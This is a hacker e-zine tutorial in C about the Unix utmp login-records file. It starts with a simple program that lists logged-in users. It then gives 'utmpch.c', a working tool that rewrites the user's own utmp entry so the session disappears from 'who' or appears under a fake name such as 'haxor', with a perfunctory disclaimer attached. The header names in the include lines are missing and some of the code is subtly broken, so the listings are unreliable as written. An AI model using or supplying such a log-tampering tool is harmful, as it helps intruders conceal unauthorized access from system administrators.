Codin` skillz (3)de bugghy
/---------------\
| Codin` skillz |
\---------------/
v1.0a
Part three
Written by: Bugghy
E-mail: bugghy@home.ro
URL: www.bugghy.home.ro
Comments/errors/bugs/jokes > bugghy@home.ro
CONTENTS
=====================================
1. Introduction
2. Theory
3. CODE 3
4. Recomandations
5. Link of the day
6. Last words
=====================================
1. Introduction
===============
For all those leet out there ... plsplsplsprettyplswithsugarontop don't read
this ... to lame ... :)))
This will be a simple/basic utmp reader... with something more interesting
in the end ... Learn and practice ...
2. Theory
=========
w,who,finger and other programs extract info from /var/run/utmp ...
So we will exploit utmp :)
3. CODE 3
=========
----------utmp.c----------
#include // for the fopen fclose fread functions
#include // man utmp, also look in utmp.h
#include // for open()
#include // for open()
#define UTMP "/var/run/utmp" // the file we're going to open
main()
{
int fd; // the file destriptor we will use to open the file
struct utmp user; // man utmp, also utmp.h
if ( (fd = open(UTMP,O_RDONLY)) == -1) // we open the utmp file for reading
{
printf("fopen() error\n");
}
while ( read(fd,&user,sizeof(user)) != 0 ) // read until EOF
// read() reads "sizeof(user)" bytes, from file descriptor "fd" into buffer "user"
// basically it stores from utmp to user so we can retrieve our info
{
if ( user.ut_type == USER_PROCESS)
{
// these checks if we have an user_process (type 7), utmp.h describes this better
printf("%s is on %s\n",user.ut_user,user.ut_line);
// we got a person on ... we print his name then his terminal
}
}
close(fd);
}
----------utmp.c----------
OK, this was too basic ... Let's make some leet stuff..
----------utmpch.c----------
#include
#include
#include
#include
#define UTMP "/var/run/utmp" // note : change this and the system() function
#define REMOVE 1
// change to 0 if you want an alternative login :)
// to 1 if you want to be removed from utmp
// and to 3 if you wanna reapear
#define ALTLOGIN "haxor" // only works if REMOVE is set to 0
main()
{
int us=0,i=0,j=0; // us = boolean, i = counter j = another counter
char *meontty; // the tty I'm on
struct utmp *user; // utmp structure, we need the pointer (*)
printf("Bugghy's utmp cleaner.. file saved in /tmp/.utmp.bak \n");
system("cp /var/run/utmp /tmp/.utmp.bak");
// we save utmp in case of problems
if ( REMOVE == 1)
printf(" Removing from utmp.. \n");
else if (REMOVE == 0)
printf(" Changing login to %s.. \n",ALTLOGIN);
else
{
printf("Use: Edit the defines to suid your needs + run
proggie\n");
exit(-1);
}
utmpname(UTMP); // so that all other functions can access utmp
// man utmpname
printf("ttyname is: %s\n",ttyname(0));
// returns the name of the terminal device
meontty = (ttyname(0)+strlen("dev/"));
// only correct for ptys named /dev/...
// then we add 4 (to pass "dev/") so we get to our second '/' :)
strcpy(meontty,++meontty);
// after that we get the string one char longer by moving it one step further
setutent();
// this gets the file pointer to the beginning of the utmp file
// we don't need to open the utmp as we used utmpname() for the path to it
// What we have done untill now is: get the device we were on, put it in a
// more suitable form, and prepare for searching in utmp
while( us==0 )
{
i++;
user = getutent();
// reads one line from utmp, and returns a pointer to the structure containing
// our values ... basically it gets the next user's info
if (strcmp(user->ut_line,meontty) == 0)
// if we are the user then end looping, the "i" var stores our place
us=1;
}
if ( REMOVE == 1 )
// if we wanna be invisible..
{
user->ut_type = LOGIN_PROCESS;
strcpy(user->ut_user,"LOGIN");
// type of login is LOGIN_PROCESS => "who" won't display you
// user name is LOGIN so "who -l" won't display you (on some systems)
} else
user->ut_type = USER_PROCESS;
// in case you removed yourself before, and now you wanna change name
if (REMOVE == 0) strcpy(user->ut_user,ALTLOGIN);
// basically we changed some data so we are a waiting terminal...
endutent();
pututline(user);
// we close the utmp file, we're done, we rest in peace (almost)
printf("If we are invisible and no errors occured, rm -f
/tmp/.utmp.bak\n");
system("who -l");
// a last advice
return 0;
}
----------utmpch.c----------
4. Recomandations
=================
Now you probably wonder what my explications mean ... To understand the
subject pls use man to get info on: utmp, who, open(2) and cat /usr/include/utmp.h
After you've read them you should have a basic understanding on how utmp
works.
BTW: open(2) = "$ man 2 open"
5. Link of the day
==================
A huge database of wargames: http://hackergames.net
6. Last words
=============
utmp.h has other options ... play with them and make a proggie that read
all the options in utmp.h, and lets you change them. That's leetness :)))
If you wanna clarify some misunderstandings in the text, add something,
bugs/comments/... mail bugghy@home.ro
THE USUAL DISCLAIMER:
---------------------
This file is for [of course] informational purposes only. I
don't take responsibility for anything anyone does after reading this file.
Gr33tz:
vMatriCS.nET , anyone that helped me (they know who they are)
Toate drepturile rezervate © www.pc-dojo.ro
Reproducerea permisa doar insotita de acordul autorului sau al site-ului
Arhiva | Adauga un articol | Despre e-zine |
http://pc-dojo.ro 
